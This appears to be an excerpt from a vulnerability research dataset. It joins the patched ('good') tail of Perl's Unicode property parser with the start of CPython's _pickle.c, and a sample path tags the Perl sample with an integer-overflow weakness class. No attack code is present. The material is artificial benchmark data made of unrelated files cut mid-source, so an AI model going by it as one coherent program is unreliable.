/* Space immediately after the '=' is ignored */
i++;
for (; i < name_len; i++) {
if (! isSPACE_A(name[i])) {
break;
}
}
/* Most punctuation after the equals indicates a subpattern, like
* \p{foo=/bar/} */
if ( isPUNCT_A(name[i])
&& name[i] != '-'
&& name[i] != '+'
&& name[i] != '_'
&& name[i] != '{')
{
/* Find the property. The table includes the equals sign, so we
* use 'j' as-is */
table_index = match_uniprop((U8 *) lookup_name, j);
if (table_index) {
const char * const * prop_values
= UNI_prop_value_ptrs[table_index];
SV * subpattern;
Size_t subpattern_len;
REGEXP * subpattern_re;
char open = name[i++];
char close;
const char * pos_in_brackets;
bool escaped = 0;
/* A backslash means the real delimitter is the next character.
* */
if (open == '\\') {
open = name[i++];
escaped = 1;
}
/* This data structure is constructed so that the matching
* closing bracket is 3 past its matching opening. The second
* set of closing is so that if the opening is something like
* ']', the closing will be that as well. Something similar is
* done in toke.c */
pos_in_brackets = strchr("([<)]>)]>", open);
close = (pos_in_brackets) ? pos_in_brackets[3] : open;
if ( i >= name_len
|| name[name_len-1] != close
|| (escaped && name[name_len-2] != '\\'))
{
sv_catpvs(msg, "Unicode property wildcard not terminated");
goto append_name_to_msg;
}
Perl_ck_warner_d(aTHX_
packWARN(WARN_EXPERIMENTAL__UNIPROP_WILDCARDS),
"The Unicode property wildcards feature is experimental");
/* Now create and compile the wildcard subpattern. Use /iaa
* because nothing outside of ASCII will match, and it the
* property values should all match /i. Note that when the
* pattern fails to compile, our added text to the user's
* pattern will be displayed to the user, which is not so
* desirable. */
subpattern_len = name_len - i - 1 - escaped;
subpattern = Perl_newSVpvf(aTHX_ "(?iaa:%.*s)",
(unsigned) subpattern_len,
name + i);
subpattern = sv_2mortal(subpattern);
subpattern_re = re_compile(subpattern, 0);
assert(subpattern_re); /* Should have died if didn't compile
successfully */
/* For each legal property value, see if the supplied pattern
* matches it. */
while (*prop_values) {
const char * const entry = *prop_values;
const Size_t len = strlen(entry);
SV* entry_sv = newSVpvn_flags(entry, len, SVs_TEMP);
if (pregexec(subpattern_re,
(char *) entry,
(char *) entry + len,
(char *) entry, 0,
entry_sv,
0))
{ /* Here, matched. Add to the returned list */
Size_t total_len = j + len;
SV * sub_invlist = NULL;
char * this_string;
/* We know this is a legal \p{property=value}. Call
* the function to return the list of code points that
* match it */
Newxz(this_string, total_len + 1, char);
Copy(lookup_name, this_string, j, char);
my_strlcat(this_string, entry, total_len + 1);
SAVEFREEPV(this_string);
sub_invlist = parse_uniprop_string(this_string,
total_len,
is_utf8,
to_fold,
runtime,
deferrable,
user_defined_ptr,
msg,
level + 1);
_invlist_union(prop_definition, sub_invlist,
&prop_definition);
}
prop_values++; /* Next iteration, look at next propvalue */
} /* End of looking through property values; (the data
structure is terminated by a NULL ptr) */
SvREFCNT_dec_NN(subpattern_re);
if (prop_definition) {
return prop_definition;
}
sv_catpvs(msg, "No Unicode property value wildcard matches:");
goto append_name_to_msg;
}
/* Here's how khw thinks we should proceed to handle the properties
* not yet done: Bidi Mirroring Glyph
Bidi Paired Bracket
Case Folding (both full and simple)
Decomposition Mapping
Equivalent Unified Ideograph
Name
Name Alias
Lowercase Mapping (both full and simple)
NFKC Case Fold
Titlecase Mapping (both full and simple)
Uppercase Mapping (both full and simple)
* Move the part that looks at the property values into a perl
* script, like utf8_heavy.pl is done. This makes things somewhat
* easier, but most importantly, it avoids always adding all these
* strings to the memory usage when the feature is little-used.
*
* The property values would all be concatenated into a single
* string per property with each value on a separate line, and the
* code point it's for on alternating lines. Then we match the
* user's input pattern m//mg, without having to worry about their
* uses of '^' and '$'. Only the values that aren't the default
* would be in the strings. Code points would be in UTF-8. The
* search pattern that we would construct would look like
* (?: \n (code-point_re) \n (?aam: user-re ) \n )
* And so $1 would contain the code point that matched the user-re.
* For properties where the default is the code point itself, such
* as any of the case changing mappings, the string would otherwise
* consist of all Unicode code points in UTF-8 strung together.
* This would be impractical. So instead, examine their compiled
* pattern, looking at the ssc. If none, reject the pattern as an
* error. Otherwise run the pattern against every code point in
* the ssc. The ssc is kind of like tr18's 3.9 Possible Match Sets
* And it might be good to create an API to return the ssc.
*
* For the name properties, a new function could be created in
* charnames which essentially does the same thing as above,
* sharing Name.pl with the other charname functions. Don't know
* about loose name matching, or algorithmically determined names.
* Decomposition.pl similarly.
*
* It might be that a new pattern modifier would have to be
* created, like /t for resTricTed, which changed the behavior of
* some constructs in their subpattern, like \A. */
} /* End of is a wildcard subppattern */
/* Certain properties whose values are numeric need special handling.
* They may optionally be prefixed by 'is'. Ignore that prefix for the
* purposes of checking if this is one of those properties */
if (memBEGINPs(lookup_name, j, "is")) {
lookup_offset = 2;
}
/* Then check if it is one of these specially-handled properties. The
* possibilities are hard-coded because easier this way, and the list
* is unlikely to change.
*
* All numeric value type properties are of this ilk, and are also
* special in a different way later on. So find those first. There
* are several numeric value type properties in the Unihan DB (which is
* unlikely to be compiled with perl, but we handle it here in case it
* does get compiled). They all end with 'numeric'. The interiors
* aren't checked for the precise property. This would stop working if
* a cjk property were to be created that ended with 'numeric' and
* wasn't a numeric type */
is_nv_type = memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "numericvalue")
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "nv")
|| ( memENDPs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "numeric")
&& ( memBEGINPs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "cjk")
|| memBEGINPs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "k")));
if ( is_nv_type
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "canonicalcombiningclass")
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "ccc")
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "age")
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "in")
|| memEQs(lookup_name + lookup_offset,
j - 1 - lookup_offset, "presentin"))
{
unsigned int k;
/* Since the stuff after the '=' is a number, we can't throw away
* '-' willy-nilly, as those could be a minus sign. Other stricter
* rules also apply. However, these properties all can have the
* rhs not be a number, in which case they contain at least one
* alphabetic. In those cases, the stricter rules don't apply.
* But the numeric type properties can have the alphas [Ee] to
* signify an exponent, and it is still a number with stricter
* rules. So look for an alpha that signifies not-strict */
stricter = TRUE;
for (k = i; k < name_len; k++) {
if ( isALPHA_A(name[k])
&& (! is_nv_type || ! isALPHA_FOLD_EQ(name[k], 'E')))
{
stricter = FALSE;
break;
}
}
}
if (stricter) {
/* A number may have a leading '+' or '-'. The latter is retained
* */
if (name[i] == '+') {
i++;
}
else if (name[i] == '-') {
lookup_name[j++] = '-';
i++;
}
/* Skip leading zeros including single underscores separating the
* zeros, or between the final leading zero and the first other
* digit */
for (; i < name_len - 1; i++) {
if ( name[i] != '0'
&& (name[i] != '_' || ! isDIGIT_A(name[i+1])))
{
break;
}
}
}
}
else { /* No '=' */
/* Only a few properties without an '=' should be parsed with stricter
* rules. The list is unlikely to change. */
if ( memBEGINPs(lookup_name, j, "perl")
&& memNEs(lookup_name + 4, j - 4, "space")
&& memNEs(lookup_name + 4, j - 4, "word"))
{
stricter = TRUE;
/* We set the inputs back to 0 and the code below will reparse,
* using strict */
i = j = 0;
}
}
/* Here, we have either finished the property, or are positioned to parse
* the remainder, and we know if stricter rules apply. Finish out, if not
* already done */
for (; i < name_len; i++) {
char cur = name[i];
/* In all instances, case differences are ignored, and we normalize to
* lowercase */
if (isUPPER_A(cur)) {
lookup_name[j++] = toLOWER(cur);
continue;
}
/* An underscore is skipped, but not under strict rules unless it
* separates two digits */
if (cur == '_') {
if ( stricter
&& ( i == 0 || (int) i == equals_pos || i == name_len- 1
|| ! isDIGIT_A(name[i-1]) || ! isDIGIT_A(name[i+1])))
{
lookup_name[j++] = '_';
}
continue;
}
/* Hyphens are skipped except under strict */
if (cur == '-' && ! stricter) {
continue;
}
/* XXX Bug in documentation. It says white space skipped adjacent to
* non-word char. Maybe we should, but shouldn't skip it next to a dot
* in a number */
if (isSPACE_A(cur) && ! stricter) {
continue;
}
lookup_name[j++] = cur;
/* Unless this is a non-trailing slash, we are done with it */
if (i >= name_len - 1 || cur != '/') {
continue;
}
slash_pos = j;
/* A slash in the 'numeric value' property indicates that what follows
* is a denominator. It can have a leading '+' and '0's that should be
* skipped. But we have never allowed a negative denominator, so treat
* a minus like every other character. (No need to rule out a second
* '/', as that won't match anything anyway */
if (is_nv_type) {
i++;
if (i < name_len && name[i] == '+') {
i++;
}
/* Skip leading zeros including underscores separating digits */
for (; i < name_len - 1; i++) {
if ( name[i] != '0'
&& (name[i] != '_' || ! isDIGIT_A(name[i+1])))
{
break;
}
}
/* Store the first real character in the denominator */
lookup_name[j++] = name[i];
}
}
/* Here are completely done parsing the input 'name', and 'lookup_name'
* contains a copy, normalized.
*
* This special case is grandfathered in: 'L_' and 'GC=L_' are accepted and
* different from without the underscores. */
if ( ( UNLIKELY(memEQs(lookup_name, j, "l"))
|| UNLIKELY(memEQs(lookup_name, j, "gc=l")))
&& UNLIKELY(name[name_len-1] == '_'))
{
lookup_name[j++] = '&';
}
/* If the original input began with 'In' or 'Is', it could be a subroutine
* call to a user-defined property instead of a Unicode property name. */
if ( non_pkg_begin + name_len > 2
&& name[non_pkg_begin+0] == 'I'
&& (name[non_pkg_begin+1] == 'n' || name[non_pkg_begin+1] == 's'))
{
starts_with_In_or_Is = TRUE;
}
else {
could_be_user_defined = FALSE;
}
if (could_be_user_defined) {
CV* user_sub;
/* If the user defined property returns the empty string, it could
* easily be because the pattern is being compiled before the data it
* actually needs to compile is available. This could be argued to be
* a bug in the perl code, but this is a change of behavior for Perl,
* so we handle it. This means that intentionally returning nothing
* will not be resolved until runtime */
bool empty_return = FALSE;
/* Here, the name could be for a user defined property, which are
* implemented as subs. */
user_sub = get_cvn_flags(name, name_len, 0);
if (user_sub) {
const char insecure[] = "Insecure user-defined property";
/* Here, there is a sub by the correct name. Normally we call it
* to get the property definition */
dSP;
SV * user_sub_sv = MUTABLE_SV(user_sub);
SV * error; /* Any error returned by calling 'user_sub' */
SV * key; /* The key into the hash of user defined sub names
*/
SV * placeholder;
SV ** saved_user_prop_ptr; /* Hash entry for this property */
/* How many times to retry when another thread is in the middle of
* expanding the same definition we want */
PERL_INT_FAST8_T retry_countdown = 10;
DECLARATION_FOR_GLOBAL_CONTEXT;
/* If we get here, we know this property is user-defined */
*user_defined_ptr = TRUE;
/* We refuse to call a potentially tainted subroutine; returning an
* error instead */
if (TAINT_get) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvn(msg, insecure, sizeof(insecure) - 1);
goto append_name_to_msg;
}
/* In principal, we only call each subroutine property definition
* once during the life of the program. This guarantees that the
* property definition never changes. The results of the single
* sub call are stored in a hash, which is used instead for future
* references to this property. The property definition is thus
* immutable. But, to allow the user to have a /i-dependent
* definition, we call the sub once for non-/i, and once for /i,
* should the need arise, passing the /i status as a parameter.
*
* We start by constructing the hash key name, consisting of the
* fully qualified subroutine name, preceded by the /i status, so
* that there is a key for /i and a different key for non-/i */
key = newSVpvn(((to_fold) ? "1" : "0"), 1);
fq_name = S_get_fq_name(aTHX_ name, name_len, is_utf8,
non_pkg_begin != 0);
sv_catsv(key, fq_name);
sv_2mortal(key);
/* We only call the sub once throughout the life of the program
* (with the /i, non-/i exception noted above). That means the
* hash must be global and accessible to all threads. It is
* created at program start-up, before any threads are created, so
* is accessible to all children. But this creates some
* complications.
*
* 1) The keys can't be shared, or else problems arise; sharing is
* turned off at hash creation time
* 2) All SVs in it are there for the remainder of the life of the
* program, and must be created in the same interpreter context
* as the hash, or else they will be freed from the wrong pool
* at global destruction time. This is handled by switching to
* the hash's context to create each SV going into it, and then
* immediately switching back
* 3) All accesses to the hash must be controlled by a mutex, to
* prevent two threads from getting an unstable state should
* they simultaneously be accessing it. The code below is
* crafted so that the mutex is locked whenever there is an
* access and unlocked only when the next stable state is
* achieved.
*
* The hash stores either the definition of the property if it was
* valid, or, if invalid, the error message that was raised. We
* use the type of SV to distinguish.
*
* There's also the need to guard against the definition expansion
* from infinitely recursing. This is handled by storing the aTHX
* of the expanding thread during the expansion. Again the SV type
* is used to distinguish this from the other two cases. If we
* come to here and the hash entry for this property is our aTHX,
* it means we have recursed, and the code assumes that we would
* infinitely recurse, so instead stops and raises an error.
* (Any recursion has always been treated as infinite recursion in
* this feature.)
*
* If instead, the entry is for a different aTHX, it means that
* that thread has gotten here first, and hasn't finished expanding
* the definition yet. We just have to wait until it is done. We
* sleep and retry a few times, returning an error if the other
* thread doesn't complete. */
re_fetch:
USER_PROP_MUTEX_LOCK;
/* If we have an entry for this key, the subroutine has already
* been called once with this /i status. */
saved_user_prop_ptr = hv_fetch(PL_user_def_props,
SvPVX(key), SvCUR(key), 0);
if (saved_user_prop_ptr) {
/* If the saved result is an inversion list, it is the valid
* definition of this property */
if (is_invlist(*saved_user_prop_ptr)) {
prop_definition = *saved_user_prop_ptr;
/* The SV in the hash won't be removed until global
* destruction, so it is stable and we can unlock */
USER_PROP_MUTEX_UNLOCK;
/* The caller shouldn't try to free this SV */
return prop_definition;
}
/* Otherwise, if it is a string, it is the error message
* that was returned when we first tried to evaluate this
* property. Fail, and append the message */
if (SvPOK(*saved_user_prop_ptr)) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catsv(msg, *saved_user_prop_ptr);
/* The SV in the hash won't be removed until global
* destruction, so it is stable and we can unlock */
USER_PROP_MUTEX_UNLOCK;
return NULL;
}
assert(SvIOK(*saved_user_prop_ptr));
/* Here, we have an unstable entry in the hash. Either another
* thread is in the middle of expanding the property's
* definition, or we are ourselves recursing. We use the aTHX
* in it to distinguish */
if (SvIV(*saved_user_prop_ptr) != PTR2IV(CUR_CONTEXT)) {
/* Here, it's another thread doing the expanding. We've
* looked as much as we are going to at the contents of the
* hash entry. It's safe to unlock. */
USER_PROP_MUTEX_UNLOCK;
/* Retry a few times */
if (retry_countdown-- > 0) {
PerlProc_sleep(1);
goto re_fetch;
}
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Timeout waiting for another thread to "
"define");
goto append_name_to_msg;
}
/* Here, we are recursing; don't dig any deeper */
USER_PROP_MUTEX_UNLOCK;
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg,
"Infinite recursion in user-defined property");
goto append_name_to_msg;
}
/* Here, this thread has exclusive control, and there is no entry
* for this property in the hash. So we have the go ahead to
* expand the definition ourselves. */
PUSHSTACKi(PERLSI_MAGIC);
ENTER;
/* Create a temporary placeholder in the hash to detect recursion
* */
SWITCH_TO_GLOBAL_CONTEXT;
placeholder= newSVuv(PTR2IV(ORIGINAL_CONTEXT));
(void) hv_store_ent(PL_user_def_props, key, placeholder, 0);
RESTORE_CONTEXT;
/* Now that we have a placeholder, we can let other threads
* continue */
USER_PROP_MUTEX_UNLOCK;
/* Make sure the placeholder always gets destroyed */
SAVEDESTRUCTOR_X(S_delete_recursion_entry, SvPVX(key));
PUSHMARK(SP);
SAVETMPS;
/* Call the user's function, with the /i status as a parameter.
* Note that we have gone to a lot of trouble to keep this call
* from being within the locked mutex region. */
XPUSHs(boolSV(to_fold));
PUTBACK;
/* The following block was taken from swash_init(). Presumably
* they apply to here as well, though we no longer use a swash --
* khw */
SAVEHINTS();
save_re_context();
/* We might get here via a subroutine signature which uses a utf8
* parameter name, at which point PL_subname will have been set
* but not yet used. */
save_item(PL_subname);
(void) call_sv(user_sub_sv, G_EVAL|G_SCALAR);
SPAGAIN;
error = ERRSV;
if (TAINT_get || SvTRUE(error)) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
if (SvTRUE(error)) {
sv_catpvs(msg, "Error \"");
sv_catsv(msg, error);
sv_catpvs(msg, "\"");
}
if (TAINT_get) {
if (SvTRUE(error)) sv_catpvs(msg, "; ");
sv_catpvn(msg, insecure, sizeof(insecure) - 1);
}
if (name_len > 0) {
sv_catpvs(msg, " in expansion of ");
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f, UTF8fARG(is_utf8,
name_len,
name));
}
(void) POPs;
prop_definition = NULL;
}
else { /* G_SCALAR guarantees a single return value */
SV * contents = POPs;
/* The contents is supposed to be the expansion of the property
* definition. If the definition is deferrable, and we got an
* empty string back, set a flag to later defer it (after clean
* up below). */
if ( deferrable
&& (! SvPOK(contents) || SvCUR(contents) == 0))
{
empty_return = TRUE;
}
else { /* Otherwise, call a function to check for valid syntax,
and handle it */
prop_definition = handle_user_defined_property(
name, name_len,
is_utf8, to_fold, runtime,
deferrable,
contents, user_defined_ptr,
msg,
level);
}
}
/* Here, we have the results of the expansion. Delete the
* placeholder, and if the definition is now known, replace it with
* that definition. We need exclusive access to the hash, and we
* can't let anyone else in, between when we delete the placeholder
* and add the permanent entry */
USER_PROP_MUTEX_LOCK;
S_delete_recursion_entry(aTHX_ SvPVX(key));
if ( ! empty_return
&& (! prop_definition || is_invlist(prop_definition)))
{
/* If we got success we use the inversion list defining the
* property; otherwise use the error message */
SWITCH_TO_GLOBAL_CONTEXT;
(void) hv_store_ent(PL_user_def_props,
key,
((prop_definition)
? newSVsv(prop_definition)
: newSVsv(msg)),
0);
RESTORE_CONTEXT;
}
/* All done, and the hash now has a permanent entry for this
* property. Give up exclusive control */
USER_PROP_MUTEX_UNLOCK;
FREETMPS;
LEAVE;
POPSTACK;
if (empty_return) {
goto definition_deferred;
}
if (prop_definition) {
/* If the definition is for something not known at this time,
* we toss it, and go return the main property name, as that's
* the one the user will be aware of */
if (! is_invlist(prop_definition)) {
SvREFCNT_dec_NN(prop_definition);
goto definition_deferred;
}
sv_2mortal(prop_definition);
}
/* And return */
return prop_definition;
} /* End of calling the subroutine for the user-defined property */
} /* End of it could be a user-defined property */
/* Here it wasn't a user-defined property that is known at this time. See
* if it is a Unicode property */
lookup_len = j; /* This is a more mnemonic name than 'j' */
/* Get the index into our pointer table of the inversion list corresponding
* to the property */
table_index = match_uniprop((U8 *) lookup_name, lookup_len);
/* If it didn't find the property ... */
if (table_index == 0) {
/* Try again stripping off any initial 'In' or 'Is' */
if (starts_with_In_or_Is) {
lookup_name += 2;
lookup_len -= 2;
equals_pos -= 2;
slash_pos -= 2;
table_index = match_uniprop((U8 *) lookup_name, lookup_len);
}
if (table_index == 0) {
char * canonical;
/* Here, we didn't find it. If not a numeric type property, and
* can't be a user-defined one, it isn't a legal property */
if (! is_nv_type) {
if (! could_be_user_defined) {
goto failed;
}
/* Here, the property name is legal as a user-defined one. At
* compile time, it might just be that the subroutine for that
* property hasn't been encountered yet, but at runtime, it's
* an error to try to use an undefined one */
if (! deferrable) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Unknown user-defined property name");
goto append_name_to_msg;
}
goto definition_deferred;
} /* End of isn't a numeric type property */
/* The numeric type properties need more work to decide. What we
* do is make sure we have the number in canonical form and look
* that up. */
if (slash_pos < 0) { /* No slash */
/* When it isn't a rational, take the input, convert it to a
* NV, then create a canonical string representation of that
* NV. */
NV value;
SSize_t value_len = lookup_len - equals_pos;
/* Get the value */
if ( value_len <= 0
|| my_atof3(lookup_name + equals_pos, &value,
value_len)
!= lookup_name + lookup_len)
{
goto failed;
}
/* If the value is an integer, the canonical value is integral
* */
if (Perl_ceil(value) == value) {
canonical = Perl_form(aTHX_ "%.*s%.0" NVff,
equals_pos, lookup_name, value);
}
else { /* Otherwise, it is %e with a known precision */
char * exp_ptr;
canonical = Perl_form(aTHX_ "%.*s%.*" NVef,
equals_pos, lookup_name,
PL_E_FORMAT_PRECISION, value);
/* The exponent generated is expecting two digits, whereas
* %e on some systems will generate three. Remove leading
* zeros in excess of 2 from the exponent. We start
* looking for them after the '=' */
exp_ptr = strchr(canonical + equals_pos, 'e');
if (exp_ptr) {
char * cur_ptr = exp_ptr + 2; /* past the 'e[+-]' */
SSize_t excess_exponent_len = strlen(cur_ptr) - 2;
assert(*(cur_ptr - 1) == '-' || *(cur_ptr - 1) == '+');
if (excess_exponent_len > 0) {
SSize_t leading_zeros = strspn(cur_ptr, "0");
SSize_t excess_leading_zeros
= MIN(leading_zeros, excess_exponent_len);
if (excess_leading_zeros > 0) {
Move(cur_ptr + excess_leading_zeros,
cur_ptr,
strlen(cur_ptr) - excess_leading_zeros
+ 1, /* Copy the NUL as well */
char);
}
}
}
}
}
else { /* Has a slash. Create a rational in canonical form */
UV numerator, denominator, gcd, trial;
const char * end_ptr;
const char * sign = "";
/* We can't just find the numerator, denominator, and do the
* division, then use the method above, because that is
* inexact. And the input could be a rational that is within
* epsilon (given our precision) of a valid rational, and would
* then incorrectly compare valid.
*
* We're only interested in the part after the '=' */
const char * this_lookup_name = lookup_name + equals_pos;
lookup_len -= equals_pos;
slash_pos -= equals_pos;
/* Handle any leading minus */
if (this_lookup_name[0] == '-') {
sign = "-";
this_lookup_name++;
lookup_len--;
slash_pos--;
}
/* Convert the numerator to numeric */
end_ptr = this_lookup_name + slash_pos;
if (! grok_atoUV(this_lookup_name, &numerator, &end_ptr)) {
goto failed;
}
/* It better have included all characters before the slash */
if (*end_ptr != '/') {
goto failed;
}
/* Set to look at just the denominator */
this_lookup_name += slash_pos;
lookup_len -= slash_pos;
end_ptr = this_lookup_name + lookup_len;
/* Convert the denominator to numeric */
if (! grok_atoUV(this_lookup_name, &denominator, &end_ptr)) {
goto failed;
}
/* It better be the rest of the characters, and don't divide by
* 0 */
if ( end_ptr != this_lookup_name + lookup_len
|| denominator == 0)
{
goto failed;
}
/* Get the greatest common denominator using
http://en.wikipedia.org/wiki/Euclidean_algorithm */
gcd = numerator;
trial = denominator;
while (trial != 0) {
UV temp = trial;
trial = gcd % trial;
gcd = temp;
}
/* If already in lowest possible terms, we have already tried
* looking this up */
if (gcd == 1) {
goto failed;
}
/* Reduce the rational, which should put it in canonical form
* */
numerator /= gcd;
denominator /= gcd;
canonical = Perl_form(aTHX_ "%.*s%s%" UVuf "/%" UVuf,
equals_pos, lookup_name, sign, numerator, denominator);
}
/* Here, we have the number in canonical form. Try that */
table_index = match_uniprop((U8 *) canonical, strlen(canonical));
if (table_index == 0) {
goto failed;
}
} /* End of still didn't find the property in our table */
} /* End of didn't find the property in our table */
/* Here, we have a non-zero return, which is an index into a table of ptrs.
* A negative return signifies that the real index is the absolute value,
* but the result needs to be inverted */
if (table_index < 0) {
invert_return = TRUE;
table_index = -table_index;
}
/* Out-of band indices indicate a deprecated property. The proper index is
* modulo it with the table size. And dividing by the table size yields
* an offset into a table constructed by regen/mk_invlists.pl to contain
* the corresponding warning message */
if (table_index > MAX_UNI_KEYWORD_INDEX) {
Size_t warning_offset = table_index / MAX_UNI_KEYWORD_INDEX;
table_index %= MAX_UNI_KEYWORD_INDEX;
Perl_ck_warner_d(aTHX_ packWARN(WARN_DEPRECATED),
"Use of '%.*s' in \\p{} or \\P{} is deprecated because: %s",
(int) name_len, name, deprecated_property_msgs[warning_offset]);
}
/* In a few properties, a different property is used under /i. These are
* unlikely to change, so are hard-coded here. */
if (to_fold) {
if ( table_index == UNI_XPOSIXUPPER
|| table_index == UNI_XPOSIXLOWER
|| table_index == UNI_TITLE)
{
table_index = UNI_CASED;
}
else if ( table_index == UNI_UPPERCASELETTER
|| table_index == UNI_LOWERCASELETTER
# ifdef UNI_TITLECASELETTER /* Missing from early Unicodes */
|| table_index == UNI_TITLECASELETTER
# endif
) {
table_index = UNI_CASEDLETTER;
}
else if ( table_index == UNI_POSIXUPPER
|| table_index == UNI_POSIXLOWER)
{
table_index = UNI_POSIXALPHA;
}
}
/* Create and return the inversion list */
prop_definition =_new_invlist_C_array(uni_prop_ptrs[table_index]);
sv_2mortal(prop_definition);
/* See if there is a private use override to add to this definition */
{
COPHH * hinthash = (IN_PERL_COMPILETIME)
? CopHINTHASH_get(&PL_compiling)
: CopHINTHASH_get(PL_curcop);
SV * pu_overrides = cophh_fetch_pv(hinthash, "private_use", 0, 0);
if (UNLIKELY(pu_overrides && SvPOK(pu_overrides))) {
/* See if there is an element in the hints hash for this table */
SV * pu_lookup = Perl_newSVpvf(aTHX_ "%d=", table_index);
const char * pos = strstr(SvPVX(pu_overrides), SvPVX(pu_lookup));
if (pos) {
bool dummy;
SV * pu_definition;
SV * pu_invlist;
SV * expanded_prop_definition =
sv_2mortal(invlist_clone(prop_definition, NULL));
/* If so, it's definition is the string from here to the next
* \a character. And its format is the same as a user-defined
* property */
pos += SvCUR(pu_lookup);
pu_definition = newSVpvn(pos, strchr(pos, '\a') - pos);
pu_invlist = handle_user_defined_property(lookup_name,
lookup_len,
0, /* Not UTF-8 */
0, /* Not folded */
runtime,
deferrable,
pu_definition,
&dummy,
msg,
level);
if (TAINT_get) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Insecure private-use override");
goto append_name_to_msg;
}
/* For now, as a safety measure, make sure that it doesn't
* override non-private use code points */
_invlist_intersection(pu_invlist, PL_Private_Use, &pu_invlist);
/* Add it to the list to be returned */
_invlist_union(prop_definition, pu_invlist,
&expanded_prop_definition);
prop_definition = expanded_prop_definition;
Perl_ck_warner_d(aTHX_ packWARN(WARN_EXPERIMENTAL__PRIVATE_USE), "The private_use feature is experimental");
}
}
}
if (invert_return) {
_invlist_invert(prop_definition);
}
return prop_definition;
failed:
if (non_pkg_begin != 0) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Illegal user-defined property name");
}
else {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Can't find Unicode property definition");
}
/* FALLTHROUGH */
append_name_to_msg:
{
const char * prefix = (runtime && level == 0) ? " \\p{" : " \"";
const char * suffix = (runtime && level == 0) ? "}" : "\"";
sv_catpv(msg, prefix);
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f, UTF8fARG(is_utf8, name_len, name));
sv_catpv(msg, suffix);
}
return NULL;
definition_deferred:
/* Here it could yet to be defined, so defer evaluation of this
* until its needed at runtime. We need the fully qualified property name
* to avoid ambiguity, and a trailing newline */
if (! fq_name) {
fq_name = S_get_fq_name(aTHX_ name, name_len, is_utf8,
non_pkg_begin != 0 /* If has "::" */
);
}
sv_catpvs(fq_name, "\n");
*user_defined_ptr = TRUE;
return fq_name;
}
#endif
/*
* ex: set ts=8 sts=4 sw=4 et:
*/
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3885_3 |
crossvul-cpp_data_good_496_0 |
/* Core extension modules are built-in on some platforms (e.g. Windows). */
#ifdef Py_BUILD_CORE
#define Py_BUILD_CORE_BUILTIN
#undef Py_BUILD_CORE
#endif
#include "Python.h"
#include "structmember.h"
PyDoc_STRVAR(pickle_module_doc,
"Optimized C implementation for the Python pickle module.");
/*[clinic input]
module _pickle
class _pickle.Pickler "PicklerObject *" "&Pickler_Type"
class _pickle.PicklerMemoProxy "PicklerMemoProxyObject *" "&PicklerMemoProxyType"
class _pickle.Unpickler "UnpicklerObject *" "&Unpickler_Type"
class _pickle.UnpicklerMemoProxy "UnpicklerMemoProxyObject *" "&UnpicklerMemoProxyType"
[clinic start generated code]*/
/*[clinic end generated code: output=da39a3ee5e6b4b0d input=4b3e113468a58e6c]*/
/* Bump HIGHEST_PROTOCOL when new opcodes are added to the pickle protocol.
Bump DEFAULT_PROTOCOL only when the oldest still supported version of Python
already includes it. */
enum {
HIGHEST_PROTOCOL = 4,
DEFAULT_PROTOCOL = 4
};
/* Pickle opcodes. These must be kept updated with pickle.py.
Extensive docs are in pickletools.py. */
enum opcode {
MARK = '(',
STOP = '.',
POP = '0',
POP_MARK = '1',
DUP = '2',
FLOAT = 'F',
INT = 'I',
BININT = 'J',
BININT1 = 'K',
LONG = 'L',
BININT2 = 'M',
NONE = 'N',
PERSID = 'P',
BINPERSID = 'Q',
REDUCE = 'R',
STRING = 'S',
BINSTRING = 'T',
SHORT_BINSTRING = 'U',
UNICODE = 'V',
BINUNICODE = 'X',
APPEND = 'a',
BUILD = 'b',
GLOBAL = 'c',
DICT = 'd',
EMPTY_DICT = '}',
APPENDS = 'e',
GET = 'g',
BINGET = 'h',
INST = 'i',
LONG_BINGET = 'j',
LIST = 'l',
EMPTY_LIST = ']',
OBJ = 'o',
PUT = 'p',
BINPUT = 'q',
LONG_BINPUT = 'r',
SETITEM = 's',
TUPLE = 't',
EMPTY_TUPLE = ')',
SETITEMS = 'u',
BINFLOAT = 'G',
/* Protocol 2. */
PROTO = '\x80',
NEWOBJ = '\x81',
EXT1 = '\x82',
EXT2 = '\x83',
EXT4 = '\x84',
TUPLE1 = '\x85',
TUPLE2 = '\x86',
TUPLE3 = '\x87',
NEWTRUE = '\x88',
NEWFALSE = '\x89',
LONG1 = '\x8a',
LONG4 = '\x8b',
/* Protocol 3 (Python 3.x) */
BINBYTES = 'B',
SHORT_BINBYTES = 'C',
/* Protocol 4 */
SHORT_BINUNICODE = '\x8c',
BINUNICODE8 = '\x8d',
BINBYTES8 = '\x8e',
EMPTY_SET = '\x8f',
ADDITEMS = '\x90',
FROZENSET = '\x91',
NEWOBJ_EX = '\x92',
STACK_GLOBAL = '\x93',
MEMOIZE = '\x94',
FRAME = '\x95'
};
enum {
/* Keep in synch with pickle.Pickler._BATCHSIZE. This is how many elements
batch_list/dict() pumps out before doing APPENDS/SETITEMS. Nothing will
break if this gets out of synch with pickle.py, but it's unclear that would
help anything either. */
BATCHSIZE = 1000,
/* Nesting limit until Pickler, when running in "fast mode", starts
checking for self-referential data-structures. */
FAST_NESTING_LIMIT = 50,
/* Initial size of the write buffer of Pickler. */
WRITE_BUF_SIZE = 4096,
/* Prefetch size when unpickling (disabled on unpeekable streams) */
PREFETCH = 8192 * 16,
